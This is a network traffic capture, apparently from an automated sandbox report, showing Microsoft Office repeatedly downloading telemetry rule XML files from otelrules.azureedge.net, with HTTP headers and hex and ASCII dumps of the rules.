                                                                                                                                                                                                        2024-12-02 06:38:43 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        18192.168.2.84982213.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:43 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:43 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:43 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 2980
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                        x-ms-request-id: 663f4ef8-b01e-0053-4c19-44cdf8000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063843Z-174f784596886s2bhC1EWR743w0000001430000000005xev
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:43 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        19192.168.2.84982013.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:43 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:43 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:43 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 3788
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                                        x-ms-request-id: 748acc8f-d01e-0082-56a3-42e489000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063843Z-174f7845968vqt9xhC1EWRgten000000140000000000dp57
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:43 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        20192.168.2.84982413.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:43 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:43 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:43 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 408
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                                        x-ms-request-id: 2c78b3d6-001e-0017-21e0-430c3c000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063843Z-174f7845968pf68xhC1EWRr4h800000014c0000000002y5d
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:43 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        21192.168.2.84982113.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:43 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:43 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:43 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 450
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                                        x-ms-request-id: e0d2e361-601e-00ab-06d4-4366f4000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063843Z-174f7845968n2hr8hC1EWR9cag00000013rg0000000042w3
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:43 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        22192.168.2.84982713.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:45 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:45 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:45 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 415
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                                        x-ms-request-id: e1e1876a-701e-0001-22c7-43b110000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063845Z-174f7845968j6t2phC1EWRcfe800000014a0000000000zdu
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:45 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        23192.168.2.84982613.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:45 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:45 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:45 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 474
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B9964B277"
                                                                                                                                                                                                        x-ms-request-id: 03f3685a-b01e-0097-2663-444f33000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063845Z-174f784596886s2bhC1EWR743w000000146g000000000tn2
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:45 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        24192.168.2.84982813.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:45 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:45 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:45 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 471
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                                        x-ms-request-id: e8c785f0-901e-0048-4ed4-43b800000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063845Z-174f7845968cdxdrhC1EWRg0en0000001440000000000duf
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:45 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        25192.168.2.84982913.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:45 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:45 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:45 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 632
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                                        x-ms-request-id: f20189e0-201e-005d-0f7c-43afb3000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063845Z-174f7845968vqt9xhC1EWRgten0000001440000000004s3s
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:45 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        26192.168.2.84983013.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:45 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:45 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:45 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 467
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                                        x-ms-request-id: c220f382-901e-0029-3552-43274a000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063845Z-174f7845968jrjrxhC1EWRmmrs000000144000000000ad3t
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:45 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        27192.168.2.84983113.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
